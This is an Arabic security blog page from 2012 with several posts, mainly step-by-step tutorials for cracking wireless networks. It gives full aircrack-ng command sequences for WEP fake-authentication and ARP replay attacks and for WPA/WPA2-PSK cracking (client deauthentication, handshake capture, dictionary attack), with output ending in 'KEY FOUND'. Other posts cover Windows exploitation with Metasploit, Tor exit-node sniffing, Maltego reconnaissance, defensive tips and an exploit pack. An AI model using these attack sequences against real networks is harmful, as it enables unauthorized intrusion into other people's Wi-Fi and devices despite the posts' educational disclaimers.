السبت، 29 ديسمبر 2012

فيديو: اختراق نظام ويندوز باستخدام Nmap و Metasploit

فيديو يشرح استخدام أداة Nmap لفحص المنافذ الموجودة بالجهاز وتحديد نوع النظام وكيفية استغلال احدى الثغرات الموجودة في مشروع ميتاسبلويت لاختراق نظام ويندوز عن بعد في مدة لا تزيد عن 5 دقائق.






إقرأ المزيد Résuméabuiyad

فيديو: WEP fake authentication attack


اليوم ان شاء الله سأشرح الـ fake authentication attack لاظهار الـ Key الخاص بشبكة وايرلس تستخدم تشفير WEP, طبعا اهم شيئ هو جمع اكبر كمية ممكنة من الحزم packets ويتم ذلك باستخدام عدة برامج من اشهرها aircrack-ng. ولكن ليستطيع البرنامج ان يجمع الحزم يجب ان يكون هناك جهاز اخر غيرك متصل بالشبكة و يستعمل الانترنت وفي كثير من الحالات نجد شبكة و لكن لا يوجد اي شخص متصل بها (كلاينت) و في هده الحالة هناك عدة اساليب بامكاننا استخدامها و اليوم ان شاء الله سأشرح اكثرها شهرة و هو الـ fake authentication attack.
الشرح باستخدام توزيعة BackTrack و يمكن تطبيقه على أي توزيعة لينكس أخرى...




خطوات العمل

1- وضع كرت الوايرلس في الـ moniter mode باستخدام الأمر:
airmon-ng start [interface]
interface = اسم كرت الوايرلس الخاص بك

2- تشغيل aircrack-ng لجمع الحزم باستخدام الأمر:
airodump-ng --bssid [target network BSSID] -c [channel] -w [aoutput] [interface]

3- تشغيل aireplay لعمل fake auth attack باستخدام الأمر:
aireplay-ng -1 [reassocciation time] -e [target network ESSID] -a [target BSSID] -h [your MAC address] [interface]

4- تشغيل aireplay-ng لعمل arp request replay attack باستخدام الأمر:
aireplay-ng -3 -e [target ESSID] -b [Target BSSID] -h [our mac address] -x [number of paclets per second] [interface]

5- فك تشفير الحزم باستخدام aircrack-ng باستخدام الأمر:
aircrack-ng output.cab

و اي استفسار أنا حاضر
هناك عدة طرق لمعرفة تشفير الشبكة بامكانك معرفته باستخدام برنامج airodump-ng من خلال الامر 
 airmon-ng wlan0
بعد دالك 
airodump-ng mon0
و ستضهر لك جميع الشبكات المتوفرة و معلوماتها.ستجد نوع التشفير تحت حقل ENC
إقرأ المزيد Résuméabuiyad

حقائق التخفي على شبكة الإنترنت وتجاوز مراقبة مزود خدمة الإنترنت


يظن البعض بإستخدامه بعض خدمات التخفي على الشبكة من أشهرها البروكسيات على الخوادم الأجنبية أو شبكة “The Onion Router” المعروفة بإ سم Tor بأن بياناته محصنة ولايمكن كشفها لاسيما بأن أغلب موفري هذه الخدمة يضمنوا درجة تشفيرها ضد الكسر وكشف البيانات. في الحقيقة يفشل أغلب الناس في فهم آلية عمل هذه الأنظمة مما يؤدي لكشف هذه البيانات عبر شخص آخر ربما يكون أخطر من مزود الخدمة نفسه.

يسألني البعض, هل ذلك يعني بأن هذه الخدمات لاتقوم بحفظ خصوصية مستخدميها؟

الإجابة: نعم ولا, فعندما قلت نعم هي تقوم فعلاً بتجاوز مراقبة مزود الخدمة ومراقبة الشبكة المحلية في حال كان المستخدم يستخدم شبكة داخلية لشركة أو مؤسسة أو شبكة عامة أو أياً كان, فعلى سبيل المثال لو كان هنالك مستخدم يستخدم TOR لإخفاء سجلات التصفح والإتصال الخاصة به فهذه الخدمة تعد من أفضل الخدمات للتخفي على الشبكة ولكن ذلك لا يمنع من وجود بعض السلبيات أو الجوانب الذي يجب على المستخدم معرفتها التي تنعكس سلباً على الأداء المفترض من إستخدام خدمة التخفي هذه. فلماذا قلت لا؟ لتفسير ذلك يجب علينا أن نفهم كيف يعمل الـ TOR : -


أولاً أنظر إلى الصوره التاليه :-

(مصدر الصوره من torproject.org)


alt


"تور" هو عبارة عن شبكة واسعة من الأجهزة الحاسوبية التي تقوم بنقل البيانات مشفرة عن طريق Nodes إلى أن تصل آخر جهاز في الشبكة الذي يسمى Exit Node

الـ Exit Node يقوم بالتواصل مع الخادم الذي طلبه العميل بإتصال غير مشفر.

في هذا المثال الجهاز Alice هو العميل, كما نرا العميل يقوم بالإتصال عن طريق سهم أخضر "وذلك يعني إتصال مشفر" إلى أن يصل إلى آخر Node في الشبكة ويسمى الـ Exit Node وبعدها يصبح السهم غير أحمر "أي إتصال غير مشفر" حيث يتصل بخادم على الإنترنت وفي هذا المثال إسمه Bob.

من هذا المثال نفهم بأن شبكة Tor تعتمد على الـ Nodes لإيصال البيانات إلى الهدف في الإنترنت, لكن ماهذه "النودز" ؟
"النودز" جميعها عبارة عن خوادم مدارة من قبل مجموعة متبرعين من حماة الخصوصية, حيث يمكن لأي شخص بتحميل برنامج TOR بأن يجعل جهازه أيضاً كـ Node أو Exit
Node


alt


مربط الفرس هنا, ماذا لو قمنا بتشغيل الخادم كـ Exit Node ؟ في هذه الحالة طبعاً سوف نكون آخر حلقة في سلسلة التشفير وبالتالي سنتواصل مع الخوادم الخارجية ببيانات غير مشفرة ونستقبل الأجوبة غير مشفرة أيضاً ثم نعيدها لشبكة التور مشفرة إلى أن تصل للعميل مرة أخرى.

بإختصار, لو كان لدينا خادم وقمنا بإعداده ليعمل كـ Exit Node وليس Node عادي, فهنا يمكننا التنصت على الإتصال بطريقة Monkey in the Middle الكلاسيكية, ويثبت هذا الكلام البحث الذي قام به السويدي Dan Egerstad حيث قام بتسريب بيانات أكثر من 100 بريد إلكتروني وبيانات سفارات وبعض الحكومات التي تستخدم هذه الخدمة لحفظ خصوصيتها !

للمزيد من التفاصيل بخصوص هذا البحث يرجى زيارة هذا الرابط:

ربما سوف يقول البعض بأن هذا البحث الذي تتحدث عنه قديم من عام 2007, أن أضمن لكم بأن المشكلة لا زالت موجودة وتعمل بأكمل وجه وبنفس درجة الخطورة! لن أخوض في التفاصيل وكيف يتم التنصت, لأن هذا قد يعرضني للمسائلة القانونية.

لكن مزودين الخدمة في العادة يقوموا بمنع تشغيل خدمات الـ TOR على خوادمهم, بل بعضهم يقوم بالمحاكمة قضائياً إن وجدوا أنك تقوم بتشغيل هذه الخدمة.

طبيعة البيانات التي تدور في هذه الشبكة خطيرة جداً, بحكم البحث الذي قمت بإجراءه بصفة شخصية, وجدت بأن أغلب البيانات لنشاطات إباحية خطيرة مثل Child pornography وهو جنس الأطفال وبعض النشاطات الأخرى المشبوهة والخطيرة جداً التي لن أتطرق لنوعيتها ابداً لكن لا أنصح أي أحد ابداً بتشغيل Exit Node على أي خادم أو حتى إتصاله بالمنزل.

فما الفائدة من إستخدام TOR إذا كان من الممكن للـ Exit Node من التنصت على الإتصال؟ أترك لكم الإجابة.
النقطة الثانية, ربما الآن البعض يسأل وماذا عن البروكسي أو الـ VPN ؟

مرة أخرى, يجب أن نعرف آلية عمل هذه الخدمة حتى نقدّر مستوى أمانها , أنظر إلى الصوره التاليه (3):-

(مصدر الصوره من publicproxyservers.com)


alt


كما نرى في الصورة (3) , جهاز الكمبيوتر الذي يستخدم إتصال بمساعدة بروكسي خارجي يقوم بالإتصال بمزود الخدمة ومزود الخدمة يقوم بتحويل الإتصال إلى خادم البروكسي ومن هناك يقوم خادم البروكسي بالتواصل مع الهدف المراد بدل من خادم مزود الخدمة مع العلم بأن الـ VPN تقريباً يعتمد على نفس الآلية في الإتصال.
حسناً, بإعتبار بأن الإتصال مشفر مابين العميل وخادم البروكسي, هذا يعني بأن خادم البروكسي يقوم بفك تشفير الإتصال ونقل البيانات بشكل خام إلى الخادم الهدف المراد التواصل معاه, بالتالي خادم البروكسي هنا يمكننا من خلاله إجراء أسلوب MitM لإستخراج البيانات التي يتم تمريرها ومعرفة كافة تفاصيلها وبالتالي نستنتج بأن خوادم البروكسي أيضاً لا يمكن الثقة بها.
ومن تجربتي الخاصة قمت بتنصيب خادم Squid على المنفذ الإفتراضي لتحليل البيانات التي تمر من خلاله وبالتأكيد النتيجة كانت مذهلة, تم استعراض جميع البيانات وعرض جميع المواقع التي جاري تصفحها وجلسات الكوكيز الخاصة بها.

الخلاصة:

  1. لاتستخدم خدمات التخفي العامة في تصفح أي شيء قد يدل إليك, مثل البريد الإلكتروني, الحسابات البنكية, الفيس بوك, وغيره من الحسابات.
  2. حاول إستخدام SSL في حال أضطررت لإستخدام خدمات التخفي العامة, لكن هذا لن يجعل SSL آمنة بنسبة 100% لأنه من المعروف بأنه يمكن تزوير هذه الشهادات.
  3. عدم إستخدام البروكسيات التي ينشرها البعض في المنتديات والمواقع.
  4. فكر قبل إستخدام خدمات الـVPN من بعض الشركات, لأنه هذه الشركات تحتفظ بسجلات الإتصال الخاصة بعملائها في حال تم طلبها من قبل جهة حكومية كلـ CIA أو الـ FBI.
  5. TOR ليس حل آمن للتخفي على الشبكة, لكنه يؤدي الغرض بشكل كبير.
  6. مزود الخدمة لديك يمكنه دائماً معرفة نشاطك في الإنترنت ويحتفظ بسجلات لجميع المواقع وجميع المنافذة التي تستخدمها في اتصالاتك بالشبكة.
  7. أفضل حل للخصوصية في وجهة نظري الشخصية هو إستخدام خوادم خاصة وتركيب عليها خادم VPN أو خادم Squid أو خلافة من الخدمات المماثلة. لكن تذكر, مزود الخدمة الخاص بالخادم يمكنه الإطلاع على سجلاتك.

إقرأ المزيد Résuméabuiyad

كسر تشفير شبكة الوايرلس WPA/WPA2 - PSK


شرح كيفية فك تشفير شبكات الوايرلس التي تستخدم تشفير WPA/WPA2-PSK عن طريق عمل هجوم Brute force لاستخراج مفتاح الشبكة باسخدام مجموعة Aricrack-ng.

معلومات يجب أن تعرفها:

Wifi
  1. هذا المقال يشرح كيفية فك تشفير الشبكات التي تستخدم برورتوكول WPA/WPA2-PSK لذلك كن متاكدا من الشبكة المستهدفة تستخدم هذا البرورتوكول.
  2. نستخدم هجوم brute force لفك تشفير WPA/WPA2-PSK لأن المفتاح ليس ثابتا لذلك فان جمع الـ IV'S كانك تريد فك تشفير WEP لن ينفع وانما ما ينفع هنا هو الـ handshake بين الكلاينت والاكسس بوينت AP.
  3. يجب أن تعلم أيضا أن المفتاح الذي تريد تخمينه يمكن ان يكون طوله بين 8 و 63 من أرقام وحروف وحتى الرموز الخاصة.
  4. يستطيع الحاسوب تجريب ما بين 50 و 300 مفتاح في الثانية اعتمادا على سرعة المعالج وقوة الاشارة وقد يدوم الأمر لساعات ان لم يدم لأيام أو شهور. واذا كنت تريد عمل قاموس به جميع الاحتمالات من أرقام ورموز وحروف كبيرة وصغيرة فاعلم انه اذا كانت هناك شبكة تستخدم مفتاح يتكون من 5 خانات (ارقام - رموز - حروف كبيرة - حروف صغيرة ) واذا كان جهازك يستطيع تجريب 1000 كلمة في الثانية فان الزمن اللازم لتجريب كل الاحتمالات هو 4 شهور.

سأستخدم نظام لينوكس وحزمة Aircrack-ng. وأنبه ﻷن المقال للاغراض العلمية فقط.

قبل البدء بعملية الكسر - BEFORE THE CRACKING:

يجب ان يكون كرت الوايرلس الذي تستخدمه يدعم الحقن او الـ injection ولمعرفة ذلك استخدم الامر التالي :
aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan0
9- تعني اختبار الحقن.
e- اسم الاكسس بوينت AP.
a- العنوان الفيزيائي للشبكة Mac adress.
wlan0 كرت الوايرلس

الناتج سيكون كالاتي:
11:01:06 ath0 channel: 9 11:01:06 Trying broadcast probe requests...
11:01:06 Injection is working!
11:01:07 Found 1 APs 11:01:07 Trying directed probe requests...
11:01:07 00:14:6C:7E:40:80 - channel: 9 - 'JONA'
11:01:07 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
11:01:07 30/30: 100%
وأهم سطرين هما الثالث والاخير وهنا القيمة في السطر الاخير هي %100 وهذا يعني ان بامكاننا عمل injection للشبكة.
يجب ان تكون قريب كفاية من الشبكة المستهدفة لكي تستطيع ارسال الباكيت لها وتذكر ان اشارة الاكسس بوينت اقوى من اشارة كرت الوايرلس لديك وهذا يعني انك اذا كنت تستطيع استقبال الباكيت من الاكسس بوينت فذلك لا يعني انك تستطيع ارسال الباكيت.

الخطوات التي سنقوم بتنفيذها - CRACKING STEPS:

  1. وضع كرت الوايرلس في الوضع monitor وفي نفس القناة التي تستخدمها الاكسس بوينت.
  2. airodump-ng للحصول على الـ authentication handshake .
  3. aireplay-ng لفصل الكلاينت عن الشبكة.
  4. aircrack-ng لفك تشفير الـ PSK باستخدام الـ handshake.

عملية كسر تشفير شبكة الوايرلس - CRACKING:

نبدأ العملية بوضع كرت الوايرلس بالوضع monitor بتنفيذ الأمر التالي:
airmon-ng start wlan0 9
wlan0: كرت الوايرلس 
9: القناة التي تستخدمها الاكسس بوينت
airodump-ng -c 9 --bssid 00:de:af:da:c7:00 -w psk wlan0
c- القناة التي تستخدمها الاكسس بوينت.
bssid-- العنوان الفيزيائي للشبكة Mac adress.
w- اسم الملف الذي ستخزن به الباكيت او الحروف التي ستضاف لاسماء الباكيت للتمييز بينها.

أهم شيء هنا هو الـ handshake وسيظهر في أعلى يمين الشاشة . ويجب ان يكون جهاز متصل بالشبكة كلاينت.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0
0- تعني deauthentication 1 هي عدد الـ deauthentication التي سيتم ارسالها
a- هي العنوان الفيزيائي للاكسس بوينت mac adress.
c- العنوان الفيزيائي للكلاينت الذي سيتم فصله.

والناتج تقريبا كالاتي:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة:
aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap
-w ملف المفاتيح الذي سيتم اختبارها
psk الاسم الذي اخترناه في الخطوة الاولى للباكيت.
والناتج سيكون كالاتي:
Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 123456 ]

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
واخيرا فان فك تشفير بروتوكول WPA-PSK مستحيل اذا كان المفتاح يتكون من اكثر من 20 خانة.

وأنبه مرة اخرى على ان الشرح للاغراض العلمية ...Yassin

إقرأ المزيد Résuméabuiyad

عشرة أفكار مفيدة للمبتدئين لتحسين أمان الشبكة وأجهزة الكمبيوتر



يشكّل أمن الشّبكات وأجهزة الكمبيوتر تحديًا كبيرًا لمدير الشبكة، وهو في معركة دائمة معه وكثيرًا ما أدى ذلك التّحدي إلى فقد مدير الشّبكة لوظيفته وأضرارٍ كبيرة للشركة وعملها .
وخاصةً بالنّسبة للشركات الصغيرة محدودة الموارد المالية، فهم أصلاً يجدون صعوبة في معرفة من أين يجب ان تكون البداية وماذا يستعملوا لمواجهة هذا التحدي، لذلك سأقوم في هذه المقالة باقتراح عشرة أدوات وطرق لمساعدتك على الوصول لمستوى أمان أفضل لشبكتك و لأجهزة الكمبيوتر:
أستعمل لينوكس: حقيقة الأمر تقول بأنه كلما جعلت المستخدمين على الشبكة يستخدمون نظام Linux، فإن ذلك الأمر سيؤدي إلى انخفاض المخاطر الأمنية، فإذا جعلت مثلا ربع المستخدمين يستخدمون Linux فإن ذلك سيؤدي إلى انخفاض المخاطر الأمنية بمقدار الربع .
ولكن قد يسأل البعض ما هم المستخدمون الذين سنجعلهم يستخدمون نظام Linux ؟ فالإجابة ستكون بأنهم المستخدمون الذين لا يملكون برامج تعمل على windows فقط، فمثلا إذا كنا نستعمل الـ Exchange فيمكننا تنصيب الـOWA على الـLinux لجعل المستخدمين يدخلون إلى الـ Web Mail.
منع المستخدمين من تنصيب البرامج: كثير من الشركات التي تقوم باتخاذ هذا الإجراء، صحيح أن هذا سيؤدي إلى بعض الإزعاج لك كمدير للشبكة ،حيث ستضطر دائمًا كل ما احتاج أحد المستخدمين لتنزيل برنامج ما إلى الذهاب لمكتبه وتنزيل ذلك البرنامج، ولكن إذا نظرنا إلى الفائدة التي سنحقّقها من وراء ذلك فهي كبيرة ،حيث سيؤدي ذلك إلى دخول فيروسات وبرامج خبيثة أقل إلى الأجهزة مقارنة بعدد الفيروسات والبرامج الخبيثة التي ستدخل فيما لو سمحنا للمستخدمين بتنزيل البرامج.
عمل ترقية للأنتي فايروس: من المهم جدًا أن يكون الـ antivirus دائمًا محدّث ،حيث أنني أشعر بالإنزعاج عندما أرى تطبيق أو antivirus غير محدث ، حيث أن تحديث الـ antivirus والتطبيقات يساعدنا على الحماية من البرامج الخبيثة ونقاط الضّعف الموجودة في البرامج.
تبديل متصفح الأنترنت: لا أريد أن أثير نقاشًا طويلأً ولكن في واقع الأمر يعتبر متصفح الـ Internet explorer الأسوأ من ناحية الأمان ،لذلك أنا أنصحك بجعل المستخدمين يستخدمون متصفح الـFirefox بدلاً من الـinternet explorer لأنه يبقى الأحسن من ناحية الأمان.
إلغاء الـ Add-ons على المتصفحات: كثير من مستخدمي المتصفحات يقومون بإضافة add-ons . حيث أن بعض هذه الـ add-ons جيد وبعضها غير جيد لذلك أنا انصح بشدة بعدم استخدام الإضافات الغير ضرورية ،لأنه على الرغم من أنها تقوم أحيانا بتحسين الأداء، إلا أننا لا نستطيع أن نضمن أنها آمنة ،وكثيرًا ما أدى إضافة بعضها إلى توقف الجهاز عن العمل.
إضافة Hardware-based Firewall : لا يقوم الـ built-in windows firewall بعمل حماية جدية حيث يكون غير فعّال كثيرًا، لذلك إذا أردت حماية حقيقيّة لابد من إضافة firewall على الشّبكة حيث سيصبح هذا الـ Firewall نقطة الدّخول الوحيدة إلى الشّبكة، وسيمنع العديد من محاولات الاختراق، أكثر بكثير من المحاولات التي سيمنعها الـ software-based firewall بالإضافة إلى ذلك فإن الـ hardware-based firewall أكثر مرونة وقابليّة للتخصيص.
تطبيق سياسات صارمة على كلمة المرور: عليك دائما أن لا تسمح للمستخدمين باختيار كلمات السّر الخاصة بهم بدون قيود، لأنك إذا فعلت ذلك ستجد أن كثيرًا من كلمات السر هي 1 أو 2 أو 12 أو حتى أسوأ من ذلك، لذلك عليك أن تضع شروط صارمة لإدخال كلمة السر. يجب أن تحوي كلمة السر حروفًا كبيرة وصغيرة وأن تحوي رموز وأرقام، ويجب أن لا تنسى أن تضع ضمن القواعد شرط أن تتغير كلمة السر كل 30 يوم، صحيح أن هذه الإجراءات ستزعج المستخدمين لكنها فعالة لزيادة الحماية.
لاتشارك الملفات مع الجميع: صحيح أن إعطاء الكل إمكانية رؤية الملفات المشتركة يوفر عليك كثيرًا من الوقت الذي تحتاجه لمعرفة لماذا بعض المستخدمين لا يمكنهم عمل دخول على ملفات الشبكة ،لكن ذلك يزيد من حماية الشبكة من المشاكل الأمنية المحتمل حدوثها بسبب جعل جميع المستخدمين يملكون إمكانية الوصول لكل الملفات.
أستخدام Network Access Control: يعتبر الـ PacketFence واحد من أقوى أدوات الـ NAC التي ستجدها، حيث يمكنك بواسطتها معالجة الدخول والتسجيل. وتعطيك إدارة مركزية سلكية ولاسلكية، وباختصار مع هذه الأدوات يمكنك الاطمئنان إلى أن الأجهزة الخبيثة التي ستحاول الاتصال ستكون فرصتها قليلة بالنجاح ولمزيد من المعلومات راجع الرابط التالي :http://www.packetfence.org/home.html
عمل فلترة للحماية من الـ Mail-ware: أنا مؤمن أنه من الأفضل أن يتم عمل فلترة للمحتوى من أجل الحماية من الـmail ware حيث يوجد بشكل واضح مجموعة من العبارات والكلمات المفتاحية والروابط التي يجب عمل فلترة لها بالاعتماد على تاريخها في التسبّب بالبرامج الخبيثة, وأنا لم أقم بوضع أفضل الكلمات الجيدة لفترة البرامج الخبيثة لذلك عليك القيام ببحث بسيط للحصول عليها.

إقرأ المزيد Résuméabuiyad

تعلم طريقة فحص المنافذ المفتوحة في حاسوبك وكشف الإختراق


انشر لك اليوم  حلقة من حلقات برنامج  تيك بوك وهو برنامج يبث على قناة الكتاب . في موضوع هذه الحلقة اتحدث عن كيفية كشف إختراق الحاسوب عبر فحص للمنافد المفتوحة ، فكلنا يعلم انه عند إختراق حاسوبك بتروجان ، فإن البريمج الضار يعمل على فتح قناة تواصل بين حاسوب المهاجم وحاسوبك ، وطبعا هذا لايمكن ان يتأتى إلا إذا إستطاع البرنامج الضار فتح منفد في حاسوبك . 

وكون ان برامج مضادات الفيروسات تبقى غير قادرة على كشف جميع التهديدات المتواجدة في العالم الإفتراضي مادمنا نتحدث عن قاعدة بيانات يمتلكها الانتي فايرس تحدث بإستمرار ، فمن الحلول الامنية المتقدمة هي فحص المنافد ، ومما لاشك فيه ان اي تروجان متواجد على حاسوبك سيعمل على فتح منفد معين في الحاسوب هذا الاخير الذي يمكننا فحصه عن طريق برنامج X-NetStat.

برنامج X-NetStat هو حل اكيد لمن يرغب في كشف الإتصالات الخارجية للحاسوب فهو يعمل على كشف remote ports وكذلك إعطائك إسم البروسيس (البرنامج ) الذي يفتح البورت، فيكفيك بعد تحميل وتتبيث البرنامج من الرابط اسفل الفيديو، ان تقوم بتشغيله لكي تضهر لك نافدة بها المنافد الخارجية وكذلك البرامج التي تستغلها . 
X-NetStat Network Radar

مايهمنا في هذا البرنامج هي خانة remote port و كذلك خانة process اي منفد مفتوح في حاسوب وتشك انه تابع لتروجان يكنك تصفح موقع Trojan Hunters او كذلك موقع simovits من اجل البحث عن تطابق البورت مع الائحة التي امامك. فمثلا لو وجدت منفد 81 مفتوح في remote port وإنتقلت إلى موقع trojan hunter ووجدت ان المنفد 81 في لائحة الموقع فهناك إحتمالية انك مصاب بعدوى ووجب عليك ثغير برنامج مضاد الحماية او إستعمال اخرى إضافية من اجل الكشف عن البرامج الضارة في حاسوبك . للمزيد من الشرح يمكنك مشاهدة فقرة [ فقرة نصائح الحماية وامن المعلومات على برنامج تيك بوك] والتي اقدمها على قناة تيك بوك 








تحميل : X-NetStat

إقرأ المزيد Résuméabuiyad

حرب الانترنت حقيقة ام خيال ؟


مقال اعجبني كتيرا قررت ان اقدمه لك اخي حتى تعرف دورالهكر في الحروب القادمة 


الكثير منا سمع عن حرب الانترنت او Cyber war و شاهدناها في الافلام و لكن هل اصبح الخيال حقيقة ؟ هل توغل الانترنت في الحياة العامة بحيث اصبح سلاح يستخدمه المخرتقون في الهجوم على الدول و المنشأات ؟

الكثير من الناس او علي الاقل نسبه كبيره من الذين يقراون الموضوع الان سمعو وعرفو فيروس stuxnet والذي تم انشاءه بواسطة مجموعه من محترفي برمجة الملفات الخبيثه لمهاجمة المنشآت النوويه الإيرانيه.
جميع المصادر التي تحدثت عن الفيروس لم تذكر فريقا بعينه او دوله بعينها او حتي فرد بعينه ولاكن بينما نجد الاختلاف واضح في هذا الامر نجد ان الجميع قد اتفق علي ان الفيروس ليس له مقصد سوي المنشآت النوويه الإيرانيه. ولا اظن انه يوجد احد لا يعرف من وراء الفيروس ومن المستفيد الاول من تدمير المنشات النوويه الايرانيه.
الكثير تحدثو عن الفيروس بالتفصيل الممل بل وفصلو حركة انتشاره واصابته للاجهزه وكونه موجه لنوعين من الالكترونيات الخ...
الى هذا الحد الموضوع طبيعي والاغلب يعرفه لكن ما لا يعرفه الكثيرين بل وما لم يتحدث عنه سوي القليلين هو الرد الايراني الذي يخطط له فريق Iran Cyber Army و هو فريق هكر ايراني معروف باختراقات مشهوره مثل اختراق موقع تويتر واختراق محرك البحث والموقع الاكثر زياره في الصين وهو بايديو Baidu. نشاط هذا الفريق كان عشوائيا و مقتصرا على بضعة اختراقات لمواقع مشهورة و بعض الانشطة التخريبية.
و لكن بعد حادثة فيروس Stuxnet بدأ الفريق يفكر بشكل مختلف و توقفوا من تنفيذ الاختراقات البسيطة و العشوائية و بدأوا بتنفيذ جرائم و هجمات الكترونية معقدة و منظمة. فقد قام الفريق ببرمجة ExploitPack  خاص بهم يحمل عدد مهول من الثغرات المكتشفه بواسطتهم في اشهر البرامج المنتشرة في الانترنت. فقد احتوى ExploitPack على 116 ثغره في الجافا , تخيلو مائه وستة عشر ثغره في الجافا التي يستخدمها ثمانين في المائه من مستخدمي الانترنت في العالم ! ليس هذا فحسب وايضا 30 ثغره في منتجات Adobe والمزيد المزيد.
هل تعرفون عندما بدأ هذا الفريق العمل بالاكسبلويت باك وقامو بتلغيم مواقع اجنبيه يزورها عشرات الالاف يوميا , هل تعرفون مقدار الضحايا الذي حصلو عليه ؟
سادع الصورة تتحدث :



هل ترون ؟ يقومون بإختراق 14000 جهاز بالساعة ,اي ما يقرب من 250 جهاز بالدقيقه !
الصورة بالاعلي توضح انه لديهم 400 الف ضحيه يعني بعد ساعات قليله من التقاط هذه الصورة وصلو الي نصف مليون ضحيه !
الصورة بالاعلي تم التقاطها عندما قام باحثون امنيون من امريكا بالتقصي وراء الفريق وحصلو علي سرفر في ماليزيا يمتلكه الفريق الايراني وكانت هذه هي احصائيته التي بالاعلي , وهذا دليل علي ان Exploit Pack مبرمج بواسطة الفريق الايراني:


بالطبع وما لا يدع مجال للشك أن الفريق لا يستخدم سرفر واحد فقط بل ان لديهم عشرات السرفرات. لو فرضنا جدلا ان الفريق الايراني يملك فقط عشر سرفرات ,كل سرفر يقوم بتحصيل خمسة عشر الف  ضحيه في الساعه فكم سيكون مجموع الاجهزه المخترقه في خلال اسبوع واحد فقط ؟؟

بينما ذكر باحثون أمنيون (بناء علي ما تم نشره بموقع seculert) بأن عدد الاجهزه المخترقه من قبل الفريق الايراني سيصل الي عشرين مليون جهاز اذا ما صار الامر كما  هو عليه لمدة شهرين فقط !!

الخطورة و السؤال الان هو ماذا سيفعل Iranian Cyber Army بهذا العدد الهائل من الاجهزة و ما الذي يخططون للقيام به بهذه القوة ؟
ماذا سيكون رد الدولية أو المؤسسة التي ستتم مهاجمتها ؟
البعض يعتقد بان هذه هي البداية فقط , هل تعتقد ان الحرب الالكترونية ستتطور اكثر من هذا ؟

إقرأ المزيد Résuméabuiyad

الجمعة، 28 ديسمبر 2012

شرح برنامج Maltego أفضل وأقوى البرامج الخاصة بعمل Information Gathering

يعتبر برنامج Maltego واحدا من أفضل وأقوى البرامج الخاصة بعمل Information Gathering وجمع المعلومات عن الهدف الذي نريد اختراقه أو معرفة بعض المعلومات عنه وبصراحة بعد استخدامي للبرنامج لفترة قصيرة وجدت أن البرنامج أكثر من رائع وخطير في بعض الأوقات وصدمت من قدرته الكبيرة على جمع المعلومات واكتشافه لأمور لم أكن أتوقعها! تعتبر مرحلة جمع المعلومات أول مرحلة يجب القيام بها في الـ Penetration Test وقبل أي محاولة اختراق لأي هدف. في السابق كنت أعتمد على بعض المواقع مثل Netcraft ومحرك البحث Google بشكل أساسي في هذه المهمة وذلك بتطبيق بعض أساليب Google Hacking وغالبا كنت أحصل على ما أريد من معلومات لكن بعد تجربتي لبرنامج Maltego أصبح الأمر أبسط, أسهل وأسرع بكثير


نستطيع مثلا البحث عن جميع المعلومات المتعلقة بشخص أو عدة أشخاص وصلة الوصل بينهم بالاعتماد على الايميل, الشبكات الاجتماعية, الموقع الالكتروني وحتى رقم الهاتف!! والكثير الكثير من الأمور الأخرى. أما في مجال الاختراق بغض النظر ان كنت Black/White Hat Hacker يفيدنا البرنامج بجمع المعلومات عن موقع أو شركة محددة أو أي هدف آخر نريد اختراقه بالاعتماد على المعلومات المتوفرة لدينا ان كانت موقع الشركة, ايميل أحد المدراء, أيبي السيرفر أو حتى نطاق الشبكة الخاص بالشركة بعد ذلك سيكون الطريق أمامنا واضح وجميع الخيارات متاحة فاما أن نبدأ الهجوم بعد أن حصلنا على جميع المعلومات التي نحتاجها أو نواصل البحث ونستخدم أساليب أكثر فعّالية مثل الهندسة الاجتماعية بالاعتماد على المعلومات التي حصلنا عليها من البرنامج لنحصل على معلومات أكثر وأدق. وقبل اكمال الموضوع من الضروري معرفة أن الشرح للغرض العلمي فقط! وهو للتعريف بهذه الأنواع من البرامج وتوضيح مدى خطورتها على الأفراد والشركات أيضا. أنا لا أشجع ولا بأي شكل من الأشكال على استخدام هذا البرنامج بشكل غير قانوني وأنت وحدك تتحمل نتيجة استخداماتك!

ناتي الى مرحلة شرح الاستخدام 


مسار تشغيل البرنامج على الباك تراك :
applications==backtrack==Information Gathering==Network analysis==DNS analysis==Maltego
















































وهدا فيديو اخر لاحد الاخوة يقوم بشرح البرنامج





الى هنا يكون الشرح قد انتهى واتركك اخي لتجرب بنفسك واكتشاف المزيد من المميزات الرائعة

إقرأ المزيد Résuméabuiyad

الثلاثاء، 25 ديسمبر 2012

الهندسة الإجتماعية هجوم Evil Twin


اخي  Mohamed Edbey هدا اول مقال يجب عليك  قراءته حتى تتضح لك الرؤية في ما يخص الهندسة الاجتماعية وكيف يفكر الهكر


مقال يتكلم عن هجوم Evil Twin وأساليب جمع المعلومات في الهندسة الإجتماعية Social Engineering التي تعتبر من أخطر الهجمات التي يصعب التصدي لها حيث الطريقة لا تعتمد على ثغرة تقنية مثلا يمكن ترقيعها بل تعتمد على ثغرات في نظام الانسان نفسه!

Face off

كثير ماتذكرني هذه الهجمات بفيلم Face Off عندما تضطر الـ FBI لعمل عملية جراحية لاحد FBI Agents للحصول على وجه مشابه للمجرم وبالتالي سيمكنهم من الوصول للمعلومات التي يريدونها. طبعا هجمة Evil Twin واحدة من اخطر الهجمات التي تعتمد على الـ Social Engineering خاصة ان مثل هذه الهجمات تحتاج خبرة اجتماعية وعلمية وذكاء شديد وطرق مدروسة وغير متوقعة من طرف المهاجم هذا غير صعوبة التصدي لها حيث الطريقة لاتعتمد على ثغرة تقنية مثلا يمكن ترقيعها بل تعتمد على ثغرات في نظام الانسان نفسه!!
